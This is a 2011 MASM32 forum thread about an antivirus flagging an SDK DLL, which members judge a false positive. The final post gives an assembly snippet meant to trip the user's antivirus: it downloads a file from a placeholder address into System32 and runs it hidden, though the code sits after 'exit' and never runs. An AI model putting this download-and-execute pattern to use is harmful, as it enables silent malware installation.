News:

MASM32 SDK Description, downloads and other helpful links
MASM32.com New Forum Link
masmforum WebSite

Trojan alert?

Started by NoCforMe, November 12, 2011, 10:56:56 AM

Previous topic - Next topic
Print
Go Down Pages 1 2
User actions

Vortex

#15
November 13, 2011, 12:04:29 AM
NoCforMe,

My intention was to help you and I know that this is an international forum. Also, it's true that the language of this forum is English and this is OK as we have here a lot of members from different countries but there is no any reason for you to be offended in any way. Probably, I should switch to the English page of Jotti's site before posting here the link but the auto-sense feature of Google Chrome ( or Jotti ) is setting the language option depending on your OS configuration. That explains the confusion and nobody is rude here. You can probably understand that I am trying to address you with a friendly voice and please take it easy.

hutch--

#16
November 13, 2011, 02:59:03 AM
The reason why there is an AV sh*tlist sub forum is to report this type of crap AV scanners. The DLL "menuedit" is part of QE and has been installed successfully on MILLIONS of computers without problems. The problem is in using crappy freebies downloaded off the internet that flag clean software as suspicious.

The sum total of the MASM32 SDK is built on an isolated computer from its own source code (apart from specific binaries) and it has NEVER had any infected files included in it. Refer to the MASM32 installation page for how to resolve problems of incorrectly configured computers in terms of either OS settings or downmarket AV scanners.
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

bolzano_1989

#17
November 13, 2011, 05:00:42 AM
NoCforMe, if you are in doubt, you could submit your suspicious files to other antivirus vendors ;) .
In your case, that file is original and clean.

NoCforMe

#18
November 13, 2011, 05:18:56 AM
Well, I submitted it to jotti, which found it to be clean, so I'm not worried about it. (And the problem with my program turned out to be a stoopid mistake.)

Vortex, sorry, didn't mean to criticize you personally. I have bookmarked that site, as it's pretty useful. Smart, too: when I submitted the file, it told me it had already been submitted and found to be OK.

So Hutch, what exactly does that DLL do that my AV finds objectionable? (Without revealing any trade secrets, of course.)

hutch--

#19
November 13, 2011, 07:46:06 AM
NoCforMe,

You are asking the wrong person, a reliable specification Portable Executable DLL is all it needs to be. The problem is using crap AV products downloaded from the internet.
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

jj2007

#20
November 13, 2011, 08:11:42 AM
Quote from: NoCforMe on November 13, 2011, 05:18:56 AM
So Hutch, what exactly does that DLL do that my AV finds objectionable? (Without revealing any trade secrets, of course.)

To test your AV, try to assemble, link (as console app) and run this snippet:
Code Select
include \masm32\include\masm32rt.inc
uselib Urlmon

.code
start: inkey "Hello World"
exit
invoke URLDownloadToFile,0,chr$("http://123.456.789"), chr$("C:\Windows\System32\test.exe"),0,0
invoke WinExec, chr$("C:\Windows\System32\test.exe"), SW_HIDE
end start
Print
Go Up Pages 1 2
User actions